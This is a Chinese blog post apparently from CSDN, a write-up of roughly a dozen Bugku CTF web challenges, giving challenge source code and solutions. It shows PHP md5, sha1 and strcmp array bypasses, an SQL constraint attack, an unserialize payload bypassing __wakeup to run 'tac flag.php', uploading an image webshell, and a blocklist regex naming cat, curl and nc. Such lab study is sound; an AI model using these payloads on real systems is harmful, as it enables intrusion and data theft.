Bugku CTF web3

最新推荐文章于 2024-05-28 16:22:37 发布
最新推荐文章于 2024-05-28 16:22:37 发布
阅读量729 收藏 2
点赞数 1
分类专栏: 刷题 wp 文章标签: php ctf 安全 网络协议 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61768489/article/details/124121725
版权

目录

字符?正则?

前女友

Login1

你从哪里来

各种绕过呦

file_get_content( )

 安慰奖

文件上传

文件包含2

需要管理员

点login咋没反应

都过滤了

字符?正则?

<?php 
highlight_file('2.php');
$key='flag{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ 
  die('key is: '.$key);
}
?>

trim()移除空白字符

这个文章超棒

 /key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i

.                                  匹配除 "\n" 之外的任何单个字符

*                                 匹配它前面的表达式0次或多次,等价于{0,}

{4,7}                           最少匹配 4 次且最多匹配 7 次,结合前面的 . 也就是匹配 4 到 7 个任意字符

\/                                匹配 / ,这里的 \ 是为了转义

[a-z]                           匹配所有小写字母

[:punct:]                     匹配任何标点符号

/i                                表示不分大小写

/?id=keyabckeyaaaaaakey:/a/keya!


前女友

翻出来源码

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

md5弱比较直接数组绕过

strcmp() 两个变量相等返回0,!strcmp($v3, $flag)要为真

可以通过报错返回0,数组和字符串无法比较,所以V3也传个数组

/?v1[]=1&v2[]=2&v3[]=3

Login1

hint:SQL约束攻击

基于约束的SQL攻击 - Angel_Kitty - 博客园

没有遇到过,了解一下原理

sql处理字符串时(一般是在比较字符串时),会自动删去末尾多余的空格,这是因为,SQL会在内部使用空格来填充字符串,以便在比较之前使其它们的长度保持一致。这一点,对于where和insert语句是成立的,对于like语句无效。

"admin"和"admin  “,最终都会得到"admin”,因此查询"admin "得到的结果是"admin"的信息

可以利用这个漏洞来绕过,方法:若注册时已知admin这个用户名存在,则我们可以注册admin(空格空格空格…)这个用户名,密码自定,然后登录时用刚刚注册的用户名和密码即可得到真实的想要的admin信息或权限。

用admin( 加空格 )当做用户名来注册

然后用admin登录

就能获得真正admin的信息,也就是拿到flag 

你从哪里来

抓包设置 Referer 成功, 开始设置User-agent 没出来

各种绕过呦

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])

        print 'passwd can not be uname.';

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

        die('Flag: '.$flag);

    else

        print 'sorry!';

}
?>

逻辑也简单, uname不等于passwd ,但他两的sha1值相等,sha1也可以数组绕过

file_get_content( )

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

主要就是file_get_contents()文件包含漏洞

/flag.txt 里面有内容: bugku

直接构造$ac=bugku,然后 $fn=flag.txt 读取到bugku 就成功了

?ac=bugku&fn=flag.txt

当然也可以自己构造一个文件出来用 php://input协议

 安慰奖

提示backups(备份)、试了一下常见备份路径 index.php.bak

<?php

header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
        }else
        {
            echo "</br>给你个安慰奖吧,hhh!</br>";
            die();
        }
    }
}
    $select = $_GET['code'];
    $res=unserialize(@$select);
?>

还是比较简单的,只需绕过__wakeup() ,读取文件用tac 就行

构造序列化如下

<?php

class ctf
{
    protected $username = 'admin';
    protected $cmd = 'tac flag.php';
}

$a = new ctf();
$b = serialize($a);
$c = str_replace(':2:', ':3:', $b);
echo urlencode($c);

文件上传

大家都说这题很坑,参考大佬文章

【bugku】web32 文件上传_小 白 萝 卜的博客-CSDN博客

后缀改成php4,这样是顺利连接上蚁剑了 ,用jpg连不上

文件包含2

这分明文件上传

根据提示 根目录访问upload.php 

 上传我的图片马

直接成功了

要在这个地址访问,显示成功,然后就可以连蚁剑

http://114.67.175.224:15398/index.php?file=upload/202204131146376442.png

需要管理员

robots.txt

访问 ,看见这个ip想到伪造ip ,但这题没用,底下有个get传参

根据题目,肯定想到搞一个admin出来,?x=admin 就给flag 了 

/resusl.php?x=admin

点login咋没反应

还以为login前端有啥问题,试了一下也没发现

dirsearch扫了一遍也没啥

css文件有个提示 

 直接访问/?17310 ,给源码了

<?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");
$cookie = $_COOKIE['BUGKU'];
if(isset($_GET['17310'])){
    show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{   
    echo "$flag";
}
else {
?>

条件也很简单

cookie传入序列化

都过滤了

  !,!=,=,+,^,-,% 像是只有这里的字符可以用

有个登录框,用admin ,bugkuctf登录进去 ,事实上是个sql盲注,有点麻烦看wp

WEB36,38:全都过滤了,你绝望吗(sql盲注)_不想带绿帽子的白帽子的博客-CSDN博客

Bugku WEB 都过滤了_显哥无敌的博客-CSDN博客_bugku 都过滤了

可以构造命令执行了 

这里查不到flag文件在哪里,只能是经验了,也许是在根目录下的flag

这里液过滤了空格 所以cat</flag

ThnPkm
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
CTF-web3
Zhang_hongchao的博客
01-08 270
打开网址能看到以下信息: $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 代码的涵义, $what=$_GET['what']; //GET 方式获取参数what echo $what; //输出what 参数的值 if($what=='flag') //if 判断 $what 是否等于 flag echo'flag{****}'; 通过GET 方式(URL)获取一个参数,参数名是`what`。 直接提交
CTF-web-web3
三天不打上房揭瓦的博客
08-25 455
前言:小编也是现学现卖,方便自己记忆,写的不好的地方还请包涵,也欢迎各位大佬多多批评指正 网址:web-web3 1.进入网址可以看到一个弹框,先阻止弹框。 2.右键查看源代码,发现是js代码,alert函数的弹框。 3.划到最下面,发现一串 HTML 编码 4.打开bp 或者其它编码软件进行解码。我这里使用bp进行解码。 将后面三个l 去掉,得到flag为:KEY{J2sa42ahJK-HS11} ...
BUUCTF-WEB3
最新发布
lin__ying的博客
05-28 298
一句话木马eval($_POST["Syc"]);
Bugku CTF web3Web
ChaoYue_miku的博客
02-14 265
0、打开网页,查看PHP源码 $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 用GET方法上传参数what=flag即可 1、得到flag:flag{b201fba34aa17859887d45dc5b248bae}
ctf-web3
gofreshman的博客
12-01 263
sql注入型题目
bugku ctf web3
qq_42777804的博客
08-12 844
这么一道题 打开后发现 一直是这两个界面                         花里胡哨   直接查看源代码(有的浏览器不可以 ,可以尝试一下 火狐)   发现最最后那一堆Unicode编码的注释可疑 &lt;!--&amp;#75;&amp;#69;&amp;#89;&amp;#123;&amp;#74;&amp;#50;&amp;#115;&amp;#...
CTF Web学习笔记
01-11
### CTF Web学习笔记知识点详解 #### 杂项部分 **1. 隐写术** 隐写术是一种将信息隐藏于其他非秘密数据之中的技术,这种技术通常用于隐蔽通信或数据保护。在CTF竞赛中,经常出现的情况是将flag隐藏在图像、音频...
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
BugkuCTFWeb--web3
VZZmieshenquan的博客
02-07 378
Description: flag就在这里快来找找吧 http://123.206.87.240:8002/web3/ Solution: 这题我先用鼠标连点器点完了所有对话框,发现页面还是空白。然后就查看页面源代码找到了HTML编码 直接Converter转换一下 Flag: KEY{J2sa42ahJK-HS11III} ...
ctfshow-WEB-web3
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第3关是一个文件包含漏洞,include()函数包含的文件会被执行,我们使用PHP伪协议配合抓包工具进行命令执行,从而获取flag 这一关的flag就存放在网站跟路径下的文件中 php://input可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效 页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的inc...
ctf.show web3
m0_63028223的博客
04-25 1416
打开题目,出现提示,php文件?,考虑文件包含漏洞。 输入参数:?url=/etc/passwd 这个报错界面出来了,说明存在文件包含漏洞 构造url值 =php://input 使用php协议 使用burp抓包 使用ls命令查看php下的文件 得到文件路径。。。。 使用cat方法查看 最终得到flag。。。。。。。。 发文助手检测到文字太少,无奈再说点什么吧,信息安全渗透,学习需要一个积累的过程,需要可以不精通但最少了解 php,java,j...
论剑CTF web-3
m0_46587008的博客
10-25 346
1.web-3 进入环境,发现upload,点开看看 那就开始上传 根据回显推测应该是白名单,# 1.web-3 进入环境,发现upload,点开看看那就开始上传根据回显推测应该是白名单,比较难突破。但是看一眼URL发现有点小惊喜 http://123.206.31.85:10003/?op=upload 这里传进去的参数是op=upload,这个opload应该是一个文件名,推测这里可能是文件包含,在index.php中包含了upload文件才出现的这个上传界面。 2.思路 进入环境,发现u
bugkuctf——web3
weixin_40980428的博客
03-30 705
打开链接后一直出现弹框阻止弹框后出现一片空白页然后打开源代码发现一串经过unicode编码的数据解码后得到flag
CTF-Web3-(SQL简单过滤绕过)
→_→
07-24 1637
3.简单的sql注入 思路: 检测是否存在注入点的两种常用方法:(更多注入详情:Sqli-labs环境通关教程-学习) 1.基于报错的检测方法 一般这种方法是输入单引号’。看是否报错,如果数据库报错,说明后台数据库处理了我们输入的数据。那么有可能存在注 入点。 2.基于布尔的检测方法---(这只是最基础的判断) 这种方法是输入: 1 and 1=1 ,通常这种情况会正常返回数据 1 and 1=2 ,通常这种情况不会返回数据或者直接报错 或者 1' and '1'='1 ,通常这种.
10-ctf-web3
a1533759138的博客
07-14 142
10-ctf-web3
Ctf.show-web3复盘
weixin_54894046的博客
05-17 386
目录 重点看这个正则匹配 你问我为啥知道是前面的\\导致后面的|\* 匹配不到?我们可以做下一个实验 然后我们来做一下题目 <html> <head> <title>ctf.show萌新计划web1</title> <meta charset="utf-8"> </head> <body> <?php # 包含数据库连接文件 include("config.php"); # 判断get..
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值